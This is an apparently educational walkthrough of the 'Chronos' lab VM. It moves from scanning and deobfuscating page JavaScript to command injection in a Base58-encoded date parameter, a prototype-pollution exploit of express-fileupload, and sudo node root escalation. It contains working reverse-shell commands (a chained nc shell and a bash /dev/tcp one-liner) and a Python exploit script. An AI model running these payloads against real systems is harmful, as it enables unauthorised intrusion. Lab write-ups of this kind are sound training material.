Getting a shell via command injection
Host discovery
Layer-2 ARP scan
arp-scan -l
The target VM is found:
192.168.56.106 08:00:27:f8:30:43 PCS Systemtechnik GmbH
Method two:
netdiscover -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:42:a6:57 1 60 PCS Systemtechnik GmbH
192.168.56.106 08:00:27:f8:30:43 1 60 PCS Systemtechnik GmbH
Port scan
nmap -p- 192.168.56.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 12:23 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.000056s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
MAC Address: 08:00:27:F8:30:43 (Oracle VirtualBox virtual NIC)
Continue with a service scan of the specific ports
nmap -p22,80,8000 -sV 192.168.56.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 12:27 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http Node.js Express framework
MAC Address: 08:00:27:F8:30:43 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.29 seconds
Port 8000 runs Node.js with the Express framework.
Web reconnaissance
Visiting port 80 shows a page with twinkling stars.
Press Ctrl+U to view the source and audit the JavaScript:
var _0x5bdf = [
    '150447srWefj',
    '70lwLrol',
    '1658165LmcNig',
    'open',
    '1260881JUqdKM',
    '10737CrnEEe',
    '2SjTdWC',
    'readyState',
    'responseText',
    '1278676qXleJg',
    '797116soVTES',
    'onreadystatechange',
    'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',
    'User-Agent',
    'status',
    '1DYOODT',
    '400909Mbbcfr',
    'Chronos',
    '2QRBPWS',
    'getElementById',
    'innerHTML',
    'date'
];
(function (_0x506b95, _0x817e36) {
    var _0x244260 = _0x432d;
    while (!![]) {
        try {
            var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));
            if (_0x35824b === _0x817e36)
                break;
            else
                _0x506b95['push'](_0x506b95['shift']());
        } catch (_0x3fb1dc) {
            _0x506b95['push'](_0x506b95['shift']());
        }
    }
}(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) {
    return _0x432d = function (_0x5bdf82, _0x432dc8) {
        _0x5bdf82 = _0x5bdf82 - 126;
        var _0x4da6e8 = _0x5bdf[_0x5bdf82];
        return _0x4da6e8;
    }, _0x432d(_0x16bd66, _0x33ffa9);
}
function loadDoc() {
    var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();
    _0x2beb35[_0x17df92(137)] = function () {
        var _0x146f5d = _0x17df92;
        this[_0x146f5d(133)] == 4 && this[_0x146f5d(140)] == 200 && (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);
    }, _0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![]), _0x2beb35['setRequestHeader'](_0x17df92(139), _0x1cff55), _0x2beb35['send']();
}
Many function and variable names are obfuscated, so a tool is needed to beautify and tidy the code:
https://gchq.github.io/CyberChef/
Use the JavaScript Beautify module from the left-hand panel.
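Beautifying only fixes the layout; the real obstacle is that every string is fetched through the `_0x432d(n)` accessor over a rotated array. The following added example (not code from the target site) copies the page's string array, offset 126 and checksum target 831262, replays the IIFE's rotation, and rewrites accessor calls into the literals they resolve to; the `deobfuscate()` helper and the sample line are constructed for this illustration.

```javascript
// Added example: resolve the string-array indirection used by the obfuscated
// script above. The array, the offset 126 and the checksum target 831262 are
// copied from the page; the helper functions are constructed.
const STRINGS = [
  '150447srWefj', '70lwLrol', '1658165LmcNig', 'open', '1260881JUqdKM',
  '10737CrnEEe', '2SjTdWC', 'readyState', 'responseText', '1278676qXleJg',
  '797116soVTES', 'onreadystatechange',
  'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',
  'User-Agent', 'status', '1DYOODT', '400909Mbbcfr', 'Chronos', '2QRBPWS',
  'getElementById', 'innerHTML', 'date',
];
const OFFSET = 126;
const TARGET = 831262;

// The obfuscator's self-check: parseInt() of the leading digits of selected
// entries, combined exactly as in the page's IIFE.
function checksum(arr) {
  const p = (i) => parseInt(arr[i - OFFSET]);
  return -p(126) * p(144) + p(142) + p(127) * p(131) - p(135)
    - p(130) * p(141) - p(136) + p(128) * p(132);
}

// Rotate a copy of the array (push(shift())) until the checksum matches, as
// the IIFE does; returns the rotated array and how many rotations were needed.
function unrotate(arr) {
  const a = arr.slice();
  let rotations = 0;
  while (checksum(a) !== TARGET) {
    a.push(a.shift());
    rotations++;
    if (rotations > a.length) throw new Error('checksum never matched');
  }
  return { strings: a, rotations };
}

// Replace every accessor call such as _0x17df92(138) with the literal it
// resolves to, so the beautified code reads like the original source.
function deobfuscate(source) {
  const { strings } = unrotate(STRINGS);
  return source.replace(/_0x[0-9a-f]+\((\d+)\)/g,
    (_, n) => JSON.stringify(strings[Number(n) - OFFSET]));
}

// Constructed sample: the open() call from loadDoc() in the page's script.
const SAMPLE = "_0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![])";
console.log(deobfuscate(SAMPLE));
```

For this script the checksum already matches before any rotation, so index 138 resolves directly to the `/date?format=` URL that the rest of the write-up follows.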
Note this URL: http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL
It looks like an API endpoint.
Note: the hosts file has to be edited for this to resolve:
/etc/hosts
C:\Windows\System32\drivers\etc\hosts
192.168.56.106 chronos.local
With that entry the page can reach the endpoint; sure enough, the home page now shows an extra clock, and packet analysis confirms it is the time returned by the URL request above.
Encoding analysis
Testing the ciphertext after the format parameter: any change to it and the response is no longer correct.
Feeding it to CyberChef's Magic module reveals Base58 encoding:
'+Today is %A, %B %d, %Y %H:%M:%S.'
This string is the output-format syntax of the Linux date command.
Getting a shell
Append a command to the format string:
'+Today is %A, %B %d, %Y %H:%M:%S.'|ls
Encode it and send it; ls runs successfully:
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 51
ETag: W/"33-6DM2EIzY4tbMmRTZn59xGEQtqRo"
Date: Mon, 11 Oct 2021 06:17:58 GMT
Connection: close
app.js
node_modules
package.json
package-lock.json
Try a reverse shell; I used a chained shell.
Use ls /bin to see which commands exist on the target.
| nc 192.168.56.103 3333 | /bin/bash | nc 192.168.56.103 4444
Shell obtained.
Privilege escalation
Three approaches to privilege escalation: kernel vulnerabilities, misconfigured SUID permissions, misconfigured sudo permissions.
If you hit a dead end, gather as much information about the target system as possible and search extensively.
Ideas come from thorough, complete information gathering.
Target information gathering
cat /etc/passwd
Found the imera account.
Found the flag under /home/imera, but without permission to read it.
Browsing the web server's directories, the breakthrough finally turned up in package.json under /opt/chronos-v2/backend:
{
    "name": "some-website",
    "version": "1.0.0",
    "description": "",
    "main": "server.js",
    "scripts": {
        "start": "node server.js"
    },
    "author": "",
    "license": "ISC",
    "dependencies": {
        "ejs": "^3.1.5",
        "express": "^4.17.1",
        "express-fileupload": "^1.1.7-alpha.3"
    }
}
Vulnerability write-ups
https://www.bleepingcomputer.com/news/security/nodejs-module-downloaded-7m-times-lets-hackers-inject-code/?cf_chl_jschl_tk=pmd_mfs6h1bzfjM65lm8.h.YPsgFFV_TUv9.beIEcm0JoyE-1633937276-0-gqNtZGzNAlCjcnBszQi9
https://blog.p6.is/Real-World-JS-1/
Escalating to a regular user
Modify the exploit at the end of that article:
import requests
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.103/5555 0>&1"'
# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})
# execute command
requests.get('http://127.0.0.1:8080')
Download it to the target with wget and run it to get a shell as imera; this also gives the first flag:
imera@chronos:/opt/chronos-v2/backend$ cat /home/imera/user.txt
cat /home/imera/user.txt
byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
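The exploit above works because the upload parser turns a dotted field name into nested object assignment and walks straight into `Object.prototype`. The following added example (constructed for this page, not code from express-fileupload or the target) shows a naive nested setter being polluted by the exploit's key name with a harmless value, the own-property check that blocks it, and the indicator a defender can test for; both setter functions are assumptions.

```javascript
// Added example: why a field name such as "__proto__.outputFunctionName" is
// dangerous when a parser expands dotted keys into nested objects, and the
// check that stops it. Both setters are constructed for illustration.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Naive nested assignment: walks the dotted path creating objects as it goes.
// Given target = {} and key "__proto__.outputFunctionName" it writes to
// Object.prototype, so every object afterwards inherits the attacker's value.
function setNestedUnsafe(target, dottedKey, value) {
  const parts = dottedKey.split('.');
  let cur = target;
  for (const p of parts.slice(0, -1)) {
    if (cur[p] === undefined) cur[p] = {};
    cur = cur[p];
  }
  cur[parts[parts.length - 1]] = value;
  return target;
}

// Hardened: refuse prototype-walking segments and only traverse own, plain
// objects, so the assignment can never leave the target.
function setNestedSafe(target, dottedKey, value) {
  const parts = dottedKey.split('.');
  if (parts.some((p) => FORBIDDEN.has(p))) throw new Error('prototype key rejected: ' + dottedKey);
  let cur = target;
  for (const p of parts.slice(0, -1)) {
    if (!Object.prototype.hasOwnProperty.call(cur, p) || typeof cur[p] !== 'object') {
      cur[p] = Object.create(null);
    }
    cur = cur[p];
  }
  cur[parts[parts.length - 1]] = value;
  return target;
}

// Pollution indicator: a brand-new object should never carry this property.
function isPolluted(prop) {
  return ({})[prop] !== undefined;
}

// Constructed demo using the exploit's key name with a harmless value.
const KEY = '__proto__.outputFunctionName';
setNestedUnsafe({}, KEY, 'polluted');
console.log('after unsafe set:', isPolluted('outputFunctionName'));   // true
delete Object.prototype.outputFunctionName;                            // clean up
try { setNestedSafe({}, KEY, 'x'); } catch (e) { console.log(e.message); }
console.log('after safe set:', isPolluted('outputFunctionName'));     // false
```

The same `isPolluted` check, run against a property name an application never sets itself, is a cheap runtime canary for prototype pollution in any Node service that accepts nested keys.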
Escalating to root
Approach: sudo misconfiguration
imera@chronos:/opt/chronos-v2/backend$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User imera may run the following commands on chronos:
(ALL) NOPASSWD: /usr/local/bin/npm *
(ALL) NOPASSWD: /usr/local/bin/node *
In other words, npm and node can be run as root without a password.
Privilege escalation through a node child process succeeds:
sudo node -e 'child_process.spawn("/bin/bash",{stdio:[0,1,2]})'
Read the root flag:
cat /root/root.txt
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK
Summary
Where I got stuck when doing this box myself:
- the encoding after format=, which I could not decode
- getting the regular user's shell
Information gathering must be thorough and the approach flexible.
Make good use of search engines!